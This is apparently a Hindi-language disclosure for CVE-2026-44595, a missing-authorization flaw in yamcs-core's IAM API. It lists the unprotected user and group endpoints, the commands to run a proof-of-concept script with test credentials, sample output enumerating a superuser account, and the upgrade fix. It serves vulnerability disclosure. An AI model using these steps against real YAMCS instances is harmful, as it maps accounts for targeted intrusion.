
# CVE-2026-44595 YAMCS IAM API के माध्यम से अनधिकृत उपयोगकर्ता गणना
yamcs-core में IAM API endpoints (listUsers, getUser, listGroups, getGroup) आवश्यक SystemPrivilege.ControlAccess जाँच को लागू नहीं करते हैं। कोई भी प्रमाणीकृत उपयोगकर्ता — यहाँ तक कि बिना किसी विशेषाधिकार वाला भी — सभी उपयोगकर्ता खातों, सुपरयूज़र स्थिति और समूह सदस्यताओं की गणना (enumerate) कर सकता है।
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2026-44595 |
| गंभीरता | MEDIUM (CVSS 4.3) |
| CWE | CWE-862: Missing Authorization |
| प्रभावित | yamcs-core < 5.12.7 |
| समाधान संस्करण | yamcs-core 5.12.7 |
| परामर्श | GHSA-p2rj-mrmc-9w29 |
निम्नलिखित endpoints में SystemPrivilege.ControlAccess प्राधिकरण जाँच अनुपलब्ध है:
GET /api/iam/users — सभी उपयोगकर्ताओं की सूची देता हैGET /api/iam/users/{name} — उपयोगकर्ता का विवरण प्राप्त करता हैGET /api/iam/groups — सभी समूहों की सूची देता हैGET /api/iam/groups/{name} — समूह का विवरण प्राप्त करता हैकम-विशेषाधिकार वाला उपयोगकर्ता इन endpoints को कॉल करके सभी उपयोगकर्ता नाम, सुपरयूज़र फ़्लैग, समूह सदस्यताएँ और पहचान प्रदाता (identity provider) जानकारी प्राप्त कर सकता है।
pip install requests
python3 poc.py http://localhost:8090 testuser testpassword
असुरक्षित इंस्टेंस पर अपेक्षित आउटपुट:
[2] Listing ALL users (IAM endpoint)...
Status: HTTP 200
[!!!] VULNERABLE: 3 users enumerated
-> admin [SUPERUSER]
-> operator [regular]
-> testuser [regular]
किसी भी वैध खाते वाला हमलावर YAMCS इंस्टेंस की संपूर्ण उपयोगकर्ता संरचना का नक्शा (map) बना सकता है — लक्षित हमलों के लिए सुपरयूज़र खातों की पहचान कर सकता है, ऑपरेटर खातों की गणना कर सकता है, और समूह-आधारित अभिगम नियंत्रणों को समझ सकता है।
yamcs-core >= 5.12.7 पर अपग्रेड करें।
| तिथि | घटना |
|---|---|
| 2026-05 | भेद्यता की रिपोर्ट दर्ज की गई |
| 2026-05-27 | yamcs-core 5.12.7 में समाधान जारी किया गया |
| 2026-05-27 | सार्वजनिक परामर्श प्रकाशित किया गया |
Daniel Miranda Barcelona (Excal1bur)